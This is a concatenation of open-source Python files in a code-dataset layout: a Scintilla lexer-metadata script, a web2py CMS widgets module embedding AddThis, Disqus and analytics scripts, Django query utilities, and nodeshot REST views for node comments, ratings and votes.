if not l.startswith("//"): # Drop comments
propertyName = l.split("\"")[1]
if propertyName.lower() == propertyName:
# Only allow lower case property names
if propertyName in knownIrregularProperties or \
propertyName.startswith("fold.") or \
propertyName.startswith("lexer."):
properties[propertyName] = 1
return properties
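# Illustrative input for FindProperties (a hypothetical lexer line, not taken
# from any real file):
#     if (styler.GetPropertyInt("fold.comment") != 0) ...
# The line contains "GetProperty" and a double quote, so "fold.comment" is
# recorded because it starts with the "fold." prefix.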
def FindPropertyDocumentation(lexFile):
documents = {}
with open(lexFile) as f:
name = ""
for l in f.readlines():
l = l.strip()
if "// property " in l:
propertyName = l.split()[2]
if propertyName.lower() == propertyName:
# Only allow lower case property names
name = propertyName
documents[name] = ""
elif "DefineProperty" in l and "\"" in l:
propertyName = l.split("\"")[1]
if propertyName.lower() == propertyName:
# Only allow lower case property names
name = propertyName
documents[name] = ""
elif name:
if l.startswith("//"):
if documents[name]:
documents[name] += " "
documents[name] += l[2:].strip()
elif l.startswith("\""):
l = l[1:].strip()
if l.endswith(";"):
l = l[:-1].strip()
if l.endswith(")"):
l = l[:-1].strip()
if l.endswith("\""):
l = l[:-1]
# Fix escaped double quotes
l = l.replace("\\\"", "\"")
documents[name] += l
else:
name = ""
for name in list(documents.keys()):
if documents[name] == "":
del documents[name]
return documents
def FindCredits(historyFile):
credits = []
stage = 0
with codecs.open(historyFile, "r", "utf-8") as f:
for l in f.readlines():
l = l.strip()
if stage == 0 and l == "<table>":
stage = 1
elif stage == 1 and l == "</table>":
stage = 2
if stage == 1 and l.startswith("<td>"):
credit = l[4:-5]
if "<a" in l:
title, a, rest = credit.partition("<a href=")
urlplus, bracket, end = rest.partition(">")
name = end.split("<")[0]
url = urlplus[1:-1]
credit = title.strip()
if credit:
credit += " "
credit += name + " " + url
credits.append(credit)
return credits
def ciCompare(a,b):
return cmp(a.lower(), b.lower())
def ciKey(a):
return a.lower()
def SortListInsensitive(l):
try: # Try key function
l.sort(key=ciKey)
except TypeError: # Earlier version of Python, so use comparison function
l.sort(ciCompare)
class ScintillaData:
def __init__(self, scintillaRoot):
        # Discover version information
with open(scintillaRoot + "version.txt") as f:
self.version = f.read().strip()
self.versionDotted = self.version[0] + '.' + self.version[1] + '.' + \
self.version[2]
self.versionCommad = self.version[0] + ', ' + self.version[1] + ', ' + \
self.version[2] + ', 0'
with open(scintillaRoot + "doc/index.html") as f:
self.dateModified = [l for l in f.readlines() if "Date.Modified" in l]\
[0].split('\"')[3]
# 20130602
# index.html, SciTE.html
dtModified = datetime.datetime.strptime(self.dateModified, "%Y%m%d")
self.yearModified = self.dateModified[0:4]
monthModified = dtModified.strftime("%B")
dayModified = "%d" % dtModified.day
self.mdyModified = monthModified + " " + dayModified + " " + self.yearModified
# May 22 2013
# index.html, SciTE.html
self.dmyModified = dayModified + " " + monthModified + " " + self.yearModified
# 22 May 2013
# ScintillaHistory.html -- only first should change
self.myModified = monthModified + " " + self.yearModified
# Find all the lexer source code files
lexFilePaths = glob.glob(scintillaRoot + "lexers/Lex*.cxx")
SortListInsensitive(lexFilePaths)
self.lexFiles = [os.path.basename(f)[:-4] for f in lexFilePaths]
self.lexerModules = []
lexerProperties = set()
self.propertyDocuments = {}
for lexFile in lexFilePaths:
self.lexerModules.extend(FindModules(lexFile))
for k in FindProperties(lexFile).keys():
lexerProperties.add(k)
documents = FindPropertyDocumentation(lexFile)
for k in documents.keys():
if k not in self.propertyDocuments:
self.propertyDocuments[k] = documents[k]
SortListInsensitive(self.lexerModules)
self.lexerProperties = list(lexerProperties)
SortListInsensitive(self.lexerProperties)
self.credits = FindCredits(scintillaRoot + "doc/ScintillaHistory.html")
def printWrapped(text):
print(textwrap.fill(text, subsequent_indent=" "))
if __name__=="__main__":
sci = ScintillaData("../")
print("Version %s %s %s" % (sci.version, sci.versionDotted, sci.versionCommad))
print("Date last modified %s %s %s %s %s" % (
sci.dateModified, sci.yearModified, sci.mdyModified, sci.dmyModified, sci.myModified))
printWrapped(str(len(sci.lexFiles)) + " lexer files: " + ", ".join(sci.lexFiles))
printWrapped(str(len(sci.lexerModules)) + " lexer modules: " + ", ".join(sci.lexerModules))
printWrapped("Lexer properties: " + ", ".join(sci.lexerProperties))
print("Lexer property documentation:")
documentProperties = list(sci.propertyDocuments.keys())
SortListInsensitive(documentProperties)
for k in documentProperties:
print(" " + k)
print(textwrap.fill(sci.propertyDocuments[k], initial_indent=" ",
subsequent_indent=" "))
print("Credits:")
for c in sci.credits:
if sys.version_info[0] == 2:
print(" " + c.encode("utf-8"))
else:
sys.stdout.buffer.write(b" " + c.encode("utf-8") + b"\n")
| gpl-2.0 |
ijoewahjoedi/instant-press | modules/widgets.py | 6 | 28658 | # -*- coding: utf-8 -*-
#
# Instant Press. Instant sites. CMS developed in Web2py Framework
# Site: http://www.instant2press.com
#
# Copyright (c) 2010 Mulone, Pablo Martín
#
# License Code: GPL, General Public License v. 2.0
# License Content: Creative Commons Attribution 3.0
#
# Also visit: www.web2py.com
# or Groups: http://groups.google.com/group/web2py
# http://groups.google.com/group/web2py-usuarios
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from gluon.html import *
from gluon.http import *
from gluon.validators import *
from gluon.sqlhtml import *
import gluon.contrib.simplejson as sj
#local
from utils import *
class Widgets(object):
def __init__(self, i2p):
self.i2p = i2p
def get_menu(self):
db = self.i2p.db
T = self.i2p.environment.T
request = self.i2p.environment.request
config = self.i2p.config
articles = self.i2p.articles
#this list the top pages
        # the maximum display length of the title is 25 characters
xml_pages=""
trunk_title = 25
(pages, pages_count) = articles.get_last_pages(1)
for page in pages:
(url, notvalid) = (IS_URL()(page.post_url))
if notvalid: #this is a normal post
link_page = articles.get_page_permanent_link(page.id, \
page.title[:trunk_title])
else: #this is a url-post
link_page = A(page.title[:trunk_title], _href=page.post_url)
xml_page = '<li>%s</li>' % link_page.xml()
#xml_pages += sanitate_string(xml_page)
xml_pages += xml_page
link_home = A(T('Home'), _href=URL(request.application,\
config.controller_default,\
'index'))
xml_menu='<ul><li>%s</li> %s </ul>' % (link_home,xml_pages)
return xml_menu
def front(self):
config = self.i2p.config
siteinfo = self.i2p.siteinfo
if config.front_enabled:
welcome_description = '<div class="entry">%s</div>' \
% siteinfo._get_frontpage()
xml = '<div class="post"> %s </div>' % welcome_description
else:
xml=""
return xml
def sidebar_aboutme(self):
db = self.i2p.db
T = self.i2p.environment.T
request = self.i2p.environment.request
config = self.i2p.config
siteinfo = self.i2p.siteinfo
about_xml = ""
if config.about_enabled:
about_caption = T('About')
about_info = siteinfo._get_aboutme()
if about_info != "":
about_description = '%s' % about_info
about_xml = '<div id="sidebar-about"><h2>%s</h2> %s </div>' \
% (about_caption, about_description)
return about_xml
def sidebar_archive(self):
config = self.i2p.config
articles = self.i2p.articles
archive_xml = ""
if config.archive_enabled:
archive_generate=""
if not config.widgets_ajax:
archive_generate = articles.get_list_archives()
archive_xml = '<div id="sidebar-archive"> %s </div>' % archive_generate
return archive_xml
def footer_archive(self):
config = self.i2p.config
articles = self.i2p.articles
archive_xml = ""
if config.archive_enabled:
archive_generate=""
if not config.widgets_ajax:
archive_generate = articles.get_list_archives()
archive_xml = '<div id="footer-widgets-archives" class="footer-columns"> %s </div>' \
% archive_generate
return archive_xml
def get_pages(self):
T = self.i2p.environment.T
pages_caption = T('Pages')
pages_generate = self.get_menu()
xml_pages = '<h2>%s</h2> %s' % (pages_caption,pages_generate)
return xml_pages
def sidebar_pages(self):
config = self.i2p.config
pages_xml = ""
if config.pages_enabled:
pages_generate=""
if not config.widgets_ajax:
pages_generate = self.get_pages()
pages_xml = '<div id="sidebar-pages"> %s </div>' % (pages_generate)
return pages_xml
def footer_pages(self):
config = self.i2p.config
pages_xml = ""
if config.pages_enabled:
pages_generate=""
if not config.widgets_ajax:
pages_generate = self.get_pages()
pages_xml = '<div id="footer-widgets-pages" class="footer-columns"> %s </div>' \
% (pages_generate)
return pages_xml
def sidebar_links(self):
config = self.i2p.config
articles = self.i2p.articles
links_xml = ""
if config.pages_enabled:
links_generate=""
if not config.widgets_ajax:
links_generate = articles.get_list_links()
links_xml = '<div id="sidebar-links"> %s </div>' % (links_generate)
return links_xml
def load_last_comments(self, page=1):
db = self.i2p.db
T = self.i2p.environment.T
request = self.i2p.environment.request
xml_comments=""
last_comments=""
header = T('Last comments')
(limit_inf, limit_sup) = get_query_limits(page, 5) #the last five comments
query = (db.comments.id>0)
last_comments = db(query).select(db.comments.ALL,\
orderby=~db.comments.comment_on,\
limitby=(limit_inf, limit_sup))
for comment in last_comments:
#author_avatar = IMG(_src=URL(r=request,c='static',f='images/avatar.png'), alt="avatar", style="padding: 5px; float:left;")
author_sytle = ""#"padding: 5px; float:left;"
author_avatar = self.i2p.comments._get_avatar(comment.author_id,\
style=author_sytle)
text_comment = comment.comment[:60]
comment_user = self.i2p.users.get_user_title(comment.author_id)
comment_time = comment.comment_on.strftime("%B %d, %Y:%I:%M %p")
link_post = self.i2p.articles.get_post_permanent_link(comment.post_id)
xml_comment = '<li><div style="float:left">%s</div> %s say: %s on %s on article %s</li>' \
% (author_avatar.xml(), comment_user, text_comment, \
comment_time, link_post.xml())
#xml_comments += sanitate_string(xml_comment)
xml_comments += xml_comment
if xml_comments!="":
last_comments="<h2>%s</h2><ul>%s</ul>" % (header,xml_comments)
return last_comments
def sidebar_last_comments(self):
comments_xml = ""
config = self.i2p.config
if config.comments_method in ['Disqus']:
comments_xml = '<div id="sidebar-last-comments"> %s </div>' % self._disqus_last_comments()
elif config.comments_method in ['Enabled']:
comments_generate=""
if not config.widgets_ajax:
comments_generate = self.load_last_comments()
comments_xml = '<div id="sidebar-last-comments"> %s </div>' % (comments_generate)
return comments_xml
def sidebar_tags(self):
config = self.i2p.config
articles = self.i2p.articles
tags_xml = ""
if config.tags_enabled:
tags_generate=""
if not config.widgets_ajax:
tags_generate = articles.get_popular_tags()
tags_xml = '<div id="sidebar-tags">%s</div><div style="clear: both; float: none;"></div>' \
% tags_generate
return tags_xml
def sidebar_feed(self):
T = self.i2p.environment.T
request = self.i2p.environment.request
config = self.i2p.config
feed_xml = ""
if config.feed_enabled:
feed_caption = T('Rss')
icon_feed_url = URL(request.application,'static','images/feed.png')
img_feed = IMG(_src=icon_feed_url, _alt="Feed", _style="padding-left: 5px;")
link_feedposts = A(T("Rss last posts"), \
_href=URL(request.application,\
config.controller_default,\
'feed_articles.rss' ))
link_feedcomments = A(T("Rss last comments"), \
_href=URL(request.application,\
config.controller_default,\
'feed_comments.rss' ))
feed_posts = '<li>%s %s</li>' % (link_feedposts, img_feed.xml())
feed_comments = '<li>%s %s</li>' % (link_feedcomments, img_feed.xml())
feed_xml = '<div id="sidebar-feed"><h2>%s</h2> <ul> %s %s </ul> </div>' \
% (feed_caption, feed_posts, feed_comments)
return feed_xml
def load_last_posts(self):
articles = self.i2p.articles
T = self.i2p.environment.T
request = self.i2p.environment.request
xml_posts=""
last_posts=""
last_entries = T('Last entries')
(posts, post_count) = articles.get_last_posts(1)
for post in posts:
link_post = articles.get_post_permanent_link(post.id, \
post.title)
xml_post = '<li>%s</li>' % link_post.xml()
xml_posts += xml_post
if xml_posts!="":
last_posts="<h2>%s</h2><ul>%s</ul>" % (last_entries,xml_posts)
return last_posts
def sidebar_last_posts(self):
config = self.i2p.config
last_posts=''
if config.last_post_enabled:
xml_posts=""
if not config.widgets_ajax:
xml_posts = self.load_last_posts()
last_posts='<div id="sidebar-last-posts">%s</div>' % xml_posts
return last_posts
def footer_last_posts(self):
config = self.i2p.config
last_posts=''
if config.last_post_enabled:
xml_posts=""
if not config.widgets_ajax:
xml_posts = self.load_last_posts()
last_posts='<div id="footer-widgets-last-posts" class="footer-columns">%s</div>' \
% xml_posts
return last_posts
def load_categories(self):
config = self.i2p.config
db = self.i2p.db
T = self.i2p.environment.T
request = self.i2p.environment.request
xml_cats=""
categories=""
cats = self.i2p.categories.get_list(page=1, limit=30)
for cat in cats:
            post_count = db(db.posts.categories.contains(str(cat.id))).count()  # note: .contains() has a known bug in web2py
text_cat = " %s (%s)" % (cat.title,post_count)
link_cat = A(text_cat,_title="%s"%cat.description,\
_href=URL(request.application,\
config.controller_default,\
'category/by_id', args=[unicode(cat.id)] ))
xml_cat = '<li>%s</li>' % link_cat.xml()
xml_cats += xml_cat
if xml_cats!="":
categories = "<h2>%s</h2>"%T('Categories')
categories += "<ul>%s</ul>"%xml_cats
return categories
def sidebar_categories(self):
config = self.i2p.config
xml_categories = ""
if config.categories_enabled:
xml_cats=""
if not config.widgets_ajax:
xml_cats = self.load_categories()
xml_categories='<div id="sidebar-categories">%s</div>' % xml_cats
return xml_categories
def footer_categories(self):
config = self.i2p.config
xml_categories = ""
if config.categories_enabled:
xml_cats=""
if not config.widgets_ajax:
xml_cats = self.load_categories()
xml_categories='<div id="footer-widgets-categories" class="footer-columns">%s</div>' \
% xml_cats
return xml_categories
def sidebar_search(self):
config = self.i2p.config
T = self.i2p.environment.T
request = self.i2p.environment.request
xml_content = ""
if config.search_enabled:
title_search = T('Search')
search_url = URL(request.application, \
config.controller_default,\
'search')
xml_content = '''<div id="sidebar-search" >
<h2>%s</h2>
<form method="get" action="%s">
<div><input type="text" name="q" id="sidebar-search-text" value="" /></div>
<div><input type="submit" id="sidebar-search-submit" value="Search" /></div>
</form>
</div>
''' % (title_search,search_url)
return xml_content
def add_this(self, url="",title="",description=""):
config = self.i2p.config
        # need fix: need to escape to something like: &amp;
if title!='':
addthis_title = 'addthis:title="%s"' % clean_html(title)
else:
addthis_title = ''
if url!='':
addthis_url = 'addthis:url="%s"' % url
else:
addthis_url = ''
if description!='':
addthis_description = 'addthis:description="%s"' % clean_html(description)
else:
addthis_description = ''
addthis = '''<!-- AddThis Button BEGIN -->
<div class="addthis_toolbox addthis_default_style">
<a href="http://www.addthis.com/bookmark.php?v=250&username=%(username)s" class="addthis_button_compact" %(url)s %(title)s %(description)s >Share</a>
<span class="addthis_separator">|</span>
<a class="addthis_button_facebook" %(url)s %(title)s %(description)s></a>
<a class="addthis_button_myspace" %(url)s %(title)s %(description)s></a>
<a class="addthis_button_google" %(url)s %(title)s %(description)s></a>
<a class="addthis_button_twitter" %(url)s %(title)s %(description)s></a>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=%(username)s"></script>
<!-- AddThis Button END --> ''' % {'username': config.addthis_user, 'url': addthis_url, 'title': addthis_title, 'description': addthis_description}
return addthis
def post_meta(self, post):
T = self.i2p.environment.T
request = self.i2p.environment.request
config = self.i2p.config
articles = self.i2p.articles
users = self.i2p.users
post_author_caption = '<span class="author">%s</span>' \
% users.get_user_title(post.created_by_id)
post_category = articles.get_post_category(post.id)
if post_category=="":
post_category = T("uncategorized")
in_category = T('in')
else:
in_category = T('in categories')
#post_time = post.published_on.strftime("%B %d, %Y at %I:%M")
post_time = post.published_on.strftime("%Y-%m-%d %I:%M")
year_full = post.published_on.strftime("%Y")
month = post.published_on.strftime("%m")
link_time = A(post_time, _href=URL(request.application,\
config.controller_default,\
'archives',args=[year_full,month]))
posted_by = T('By')
updated_on = T('Published on')
byline = '%s %s %s %s %s %s' % (updated_on, link_time.xml(), posted_by, \
post_author_caption, in_category, post_category)
return byline
def post_extract(self, post):
config = self.i2p.config
T = self.i2p.environment.T
request = self.i2p.environment.request
comments = self.i2p.comments
articles = self.i2p.articles
label_comments = "%s" % T('Comments')
if config.comments_method in ['Enabled'] and not config.widgets_ajax:
comments_count = comments._get_comment_count(post.id)
elif config.comments_method in ['Disqus']:
comments_count = ""
else:
comments_count = 0
if config.comments_method in ['Disqus']:
link_comments = articles.get_post_permanent_link(post.id, \
'Comments', \
'disqus_thread')
else:
link_comments = articles.get_post_permanent_link(post.id, \
label_comments, \
'comments')
link_readmore = articles.get_post_permanent_link(post.id, T("Read more"))
base_http = 'http://' + str(request.env.http_host)
url_permanent = articles.get_post_permanent_link(post.id, only_url=True )
url_post = str(base_http + url_permanent)
if config.addthis_enabled:
#add_this = self.add_this(url_post,post.title,post.text_slice[:100]) #need to pass: title, url, description
add_this = self.add_this(url_permanent,post.title,post.text_slice[:100]) #need to pass: title, url, description
else:
add_this = ""
xml_post = '<div class="post">'
xml_post +='<h2 class="title">%s</h2>' \
% articles.get_post_permanent_link(post.id).xml()
xml_post +='''<div class="meta">%s -
<span class="comments-count" id="comments-count_%s"> %s </span>
%s
</div>''' \
% (self.post_meta(post), post.id, comments_count, link_comments.xml())
if config.editor_language in ['Markmin']:
text_slice = MARKMIN(post.text_slice)
else:
text_slice = post.text_slice
xml_post +='<div class="entry">%s</div>' % text_slice
xml_post +='''<div class="links">
<div class="readmore"> %s </div>
<div class="addthis"> %s </div>
<div style="float:none; clear:both;"></div>
</div>''' % (link_readmore.xml(), add_this)
xml_post +='</div>'
return xml_post
def last_posts(self, page):
articles = self.i2p.articles
(posts, count_posts) = articles.get_last_posts(page)
xml_posts = articles.get_xml_results_from_posts(posts)
xml_posts += articles.pagination_last_post(page, count_posts)
return xml_posts
def disqus_comments(self):
config = self.i2p.config
if config.disqus_dev:
            developer = 'var disqus_developer = 1;'
        else:
            developer = ''
script = '''
<div id="disqus_thread"></div>
<script type="text/javascript">
%(developer)s
/**
* var disqus_identifier; [Optional but recommended: Define a unique identifier (e.g. post id or slug) for this thread]
*/
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = 'http://%(site)s.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript=%(site)s">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">blog comments powered by <span class="logo-disqus">Disqus</span></a>
''' % {'developer': developer, 'site': config.disqus_site}
return script
def disqus_comments_count(self):
config = self.i2p.config
script = '''
<script type="text/javascript">
var disqus_shortname = '%(site)s';
(function () {
var s = document.createElement('script'); s.async = true;
s.src = 'http://disqus.com/forums/%(site)s/count.js';
(document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
}());
</script>
''' % {'site': config.disqus_site}
return script
def _disqus_last_comments(self):
T = self.i2p.environment.T
config = self.i2p.config
if self.i2p.config.avatars_enabled:
hide_avatars = 0
else:
hide_avatars = 1
avatar_size = self.i2p.config.avatar_size
recent_comments=T("Recent Comments")
num_items = 5
script = '''
<div id="recentcomments" class="dsq-widget">
<h2 class="dsq-widget-title">%(recent_comments)s</h2>
<script type="text/javascript" src="http://disqus.com/forums/%(site)s/recent_comments_widget.js?num_items=%(num_items)s&hide_avatars=%(hide_avatars)s&avatar_size=%(avatar_size)s&excerpt_length=200">
</script>
</div>
<a href="http://disqus.com/">Powered by Disqus</a>
''' % {'site': config.disqus_site, 'recent_comments': recent_comments, 'avatar_size': avatar_size, 'hide_avatars': hide_avatars, 'num_items': num_items}
return script
def sidebar_popular_threads(self):
config = self.i2p.config
popular_threads=''
#for now only in disqus
if config.comments_method in ['Disqus']:
popular_threads='<div id="sidebar-popular-threads">%s</div>' % self._disqus_popular_threads()
return popular_threads
def _disqus_popular_threads(self):
config = self.i2p.config
T = self.i2p.environment.T
popular_threads=T("Popular Threads")
script = '''
<div id="popularthreads" class="dsq-widget">
<h2 class="dsq-widget-title">%(popular_threads)s</h2>
<script type="text/javascript" src="http://disqus.com/forums/%(site)s/popular_threads_widget.js?num_items=5">
</script>
</div>
<a href="http://disqus.com/">Powered by Disqus</a>
'''% {'site': config.disqus_site,'popular_threads':popular_threads}
return script
def sidebar_top_commenters(self):
config = self.i2p.config
top_commenters=''
#for now only in disqus
if config.comments_method in ['Disqus']:
top_commenters='<div id="sidebar-top-commenters">%s</div>' % self._disqus_top_commenters()
return top_commenters
def _disqus_top_commenters(self):
T = self.i2p.environment.T
config = self.i2p.config
avatar_size = self.i2p.config.avatar_size
if self.i2p.config.avatars_enabled:
hide_avatars = 0
else:
hide_avatars = 1
num_items = 5
top_commenters=T('Top Commenters')
script = '''
<div id="topcommenters" class="dsq-widget">
<h2 class="dsq-widget-title">%(top_commenters)s</h2>
<script type="text/javascript" src="http://disqus.com/forums/%(site)s/top_commenters_widget.js?num_items=%(num_items)s&hide_mods=0&hide_avatars=%(hide_avatars)s&avatar_size=%(avatar_size)s">
</script>
</div>
<a href="http://disqus.com/">Powered by Disqus</a>
'''% {'site': config.disqus_site, 'top_commenters':top_commenters, 'avatar_size':avatar_size, 'hide_avatars':hide_avatars, 'num_items':num_items}
return script
def sidebar_combination(self):
config = self.i2p.config
T = self.i2p.environment.T
head_combination = T('Posts')
combination=''
#for now only in disqus
if config.comments_method in ['Disqus']:
combination='<div id="sidebar-combination"><h2>%s</h2>%s</div>' % (head_combination, self._disqus_combination())
return combination
def _disqus_combination(self):
config = self.i2p.config
num_items = 5
script = '''
<script type="text/javascript" src="http://disqus.com/forums/%(site)s/combination_widget.js?num_items=%(num_items)s&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200">
</script>
<a href="http://disqus.com/">Powered by Disqus</a>
'''% {'site': config.disqus_site, 'num_items':num_items}
return script
def ga_script(self):
config = self.i2p.config
script=""
if config.ga_enabled:
script = '''
<script>
var _gaq = [['_setAccount', '%(ga_id)s'], ['_trackPageview']];
(function(d, t) {
var g = d.createElement(t),
s = d.getElementsByTagName(t)[0];
g.async = true;
g.src = '//www.google-analytics.com/ga.js';
s.parentNode.insertBefore(g, s);
})(document, 'script');
</script>
''' % {'ga_id': config.ga_id}
return script
| gpl-2.0 |
umitproject/tease-o-matic | django/db/models/query_utils.py | 240 | 5799 | """
Various data structures used in query construction.
Factored out from django.db.models.query to avoid making the main module very
large and/or so that they can be used by other modules without getting into
circular import difficulties.
"""
import weakref
from django.utils.copycompat import deepcopy
from django.db.backends import util
from django.utils import tree
from django.utils.datastructures import SortedDict
class InvalidQuery(Exception):
"""
The query passed to raw isn't a safe query to use with raw.
"""
pass
class QueryWrapper(object):
"""
    A type that indicates the contents are an SQL fragment and the associated
parameters. Can be used to pass opaque data to a where-clause, for example.
"""
def __init__(self, sql, params):
self.data = sql, params
def as_sql(self, qn=None, connection=None):
return self.data
class Q(tree.Node):
"""
Encapsulates filters as objects that can then be combined logically (using
& and |).
"""
# Connection types
AND = 'AND'
OR = 'OR'
default = AND
def __init__(self, *args, **kwargs):
super(Q, self).__init__(children=list(args) + kwargs.items())
def _combine(self, other, conn):
if not isinstance(other, Q):
raise TypeError(other)
obj = type(self)()
obj.add(self, conn)
obj.add(other, conn)
return obj
def __or__(self, other):
return self._combine(other, self.OR)
def __and__(self, other):
return self._combine(other, self.AND)
def __invert__(self):
obj = type(self)()
obj.add(self, self.AND)
obj.negate()
return obj
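# Illustrative usage of Q (a sketch; "Entry" and its fields are assumptions,
# not defined in this module):
#
#     Entry.objects.filter(Q(title__startswith='a') | Q(rating__gte=4))
#     Entry.objects.filter(~Q(status='draft'))  # uses __invert__ above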
class DeferredAttribute(object):
"""
A wrapper for a deferred-loading field. When the value is read from this
object the first time, the query is executed.
"""
def __init__(self, field_name, model):
self.field_name = field_name
self.model_ref = weakref.ref(model)
self.loaded = False
def __get__(self, instance, owner):
"""
Retrieves and caches the value from the datastore on the first lookup.
Returns the cached value.
"""
from django.db.models.fields import FieldDoesNotExist
assert instance is not None
cls = self.model_ref()
data = instance.__dict__
if data.get(self.field_name, self) is self:
# self.field_name is the attname of the field, but only() takes the
# actual name, so we need to translate it here.
try:
cls._meta.get_field_by_name(self.field_name)
name = self.field_name
except FieldDoesNotExist:
name = [f.name for f in cls._meta.fields
if f.attname == self.field_name][0]
# We use only() instead of values() here because we want the
            # various data coercion methods (to_python(), etc.) to be called
# here.
val = getattr(
cls._base_manager.filter(pk=instance.pk).only(name).using(
instance._state.db).get(),
self.field_name
)
data[self.field_name] = val
return data[self.field_name]
def __set__(self, instance, value):
"""
Deferred loading attributes can be set normally (which means there will
        never be a database lookup involved).
"""
instance.__dict__[self.field_name] = value
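# Illustrative behaviour of DeferredAttribute (a sketch; "Entry" and its
# fields are assumptions):
#
#     e = Entry.objects.only('title').get(pk=1)
#     e.title   # already loaded; no extra query
#     e.body    # deferred: __get__ above runs one query to fetch 'body'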
def select_related_descend(field, restricted, requested, reverse=False):
"""
Returns True if this field should be used to descend deeper for
select_related() purposes. Used by both the query construction code
(sql.query.fill_related_selections()) and the model instance creation code
(query.get_cached_row()).
Arguments:
* field - the field to be checked
* restricted - a boolean field, indicating if the field list has been
       manually restricted using a requested clause
* requested - The select_related() dictionary.
* reverse - boolean, True if we are checking a reverse select related
"""
if not field.rel:
return False
if field.rel.parent_link and not reverse:
return False
if restricted:
if reverse and field.related_query_name() not in requested:
return False
if not reverse and field.name not in requested:
return False
if not restricted and field.null:
return False
return True
# This function is needed because data descriptors must be defined on a class
# object, not an instance, to have any effect.
def deferred_class_factory(model, attrs):
"""
Returns a class object that is a copy of "model" with the specified "attrs"
    being replaced with DeferredAttribute objects; each such attribute loads
    its value from the database on first access.
"""
class Meta:
proxy = True
app_label = model._meta.app_label
# The app_cache wants a unique name for each model, otherwise the new class
# won't be created (we get an old one back). Therefore, we generate the
# name using the passed in attrs. It's OK to reuse an existing class
# object if the attrs are identical.
name = "%s_Deferred_%s" % (model.__name__, '_'.join(sorted(list(attrs))))
name = util.truncate_name(name, 80, 32)
overrides = dict([(attr, DeferredAttribute(attr, model))
for attr in attrs])
overrides["Meta"] = Meta
overrides["__module__"] = model.__module__
overrides["_deferred"] = True
return type(name, (model,), overrides)
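# Illustrative call (a sketch; "Entry" is an assumption):
#
#     DeferredEntry = deferred_class_factory(Entry, ['body', 'pubdate'])
#
# The returned proxy class loads 'body' and 'pubdate' lazily through
# DeferredAttribute on first access.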
# The above function is also used to unpickle model instances with deferred
# fields.
deferred_class_factory.__safe_for_unpickling__ = True
| bsd-3-clause |
chachan/nodeshot | nodeshot/community/participation/views.py | 5 | 2627 | from django.utils.translation import ugettext_lazy as _
from django.shortcuts import get_object_or_404
from django.contrib.auth import get_user_model
User = get_user_model()
from rest_framework import permissions, authentication, generics
from rest_framework.response import Response
from nodeshot.core.nodes.models import Node
from .models import Rating, Vote, Comment
from .serializers import * # noqa
class NodeRelationViewMixin(object):
def initial(self, request, *args, **kwargs):
"""
Custom initial method:
* ensure node exists and store it in an instance attribute
* change queryset to return only comments of current node
"""
super(NodeRelationViewMixin, self).initial(request, *args, **kwargs)
self.node = get_object_or_404(Node, **{'slug': self.kwargs['slug']})
self.queryset = self.model.objects.filter(node_id=self.node.id)
def perform_create(self, serializer):
serializer.save(user=self.request.user)
class NodeComments(NodeRelationViewMixin, generics.ListCreateAPIView):
"""
### GET
Retrieve a **list** of comments for the specified node
### POST
Add a comment to the specified node
"""
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
serializer_class = CommentSerializer
model = Comment
node_comments = NodeComments.as_view()
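# Illustrative URL wiring (a sketch; the pattern below is an assumption, not
# part of this module):
#
#     url(r'^nodes/(?P<slug>[-\w]+)/comments/$', node_comments)
#
# NodeRelationViewMixin.initial() reads kwargs['slug'] to resolve the Node
# before filtering the queryset.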
class NodeRatings(NodeRelationViewMixin, generics.CreateAPIView):
"""
### POST
Rate the specified node
"""
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
serializer_class = RatingSerializer
model = Rating
node_ratings = NodeRatings.as_view()
class NodeVotes(NodeRelationViewMixin, generics.CreateAPIView):
"""
### POST
Vote for the specified node
"""
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
serializer_class = VoteSerializer
model = Vote
def delete(self, *args, **kwargs):
votes = Vote.objects.filter(node_id=self.node.id, user_id=self.request.user.id)
if (len(votes) > 0):
for vote in votes:
vote.delete()
message = _('Vote for this node removed')
status = 200
else:
message = _('User has not voted this node yet')
status = 400
return Response({'details': message}, status=status)
node_votes = NodeVotes.as_view()
| gpl-3.0 |